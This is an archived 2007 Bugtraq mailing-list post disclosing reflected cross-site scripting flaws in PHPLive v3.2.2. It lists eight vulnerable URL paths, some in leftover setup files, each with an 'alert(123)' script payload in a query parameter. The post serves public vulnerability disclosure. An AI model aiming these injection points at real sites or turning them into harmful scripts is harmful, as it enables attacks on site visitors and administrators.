[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

bugtraq submission

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: bugtraq submission
From: dr.rezen@xxxxxxxxx
Date: Fri, 01 Jun 2007 12:50:17 -0400

There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others)

/phplive/chat.php?sid=<script>alert(123);</script>
/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>
/phplive/admin/header.php?admin[name]=<script>alert(123);</script>
/phplive/super/info.php?BASE_URL=<script>alert(123);</script>

And if serveradmin left default setup install files:

/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script>
/phplive/setup/footer.php?nav_line=<script>alert(123);</script>

Bug found by ReZEN! XORCREW! H4X H4X!

Follow-Ups:
- RE: bugtraq submission
  - From: Warner Moore

Prev by Date: [MajorSecurity Advisory #50]chameleon cms - Session fixation Issue
Next by Date: [MajorSecurity Advisory #49]Calimero.CMS - Session fixation Issue
Previous by thread: Re: [MajorSecurity Advisory #50]chameleon cms - Session fixation Issue
Next by thread: RE: bugtraq submission
Index(es):
- Date
- Thread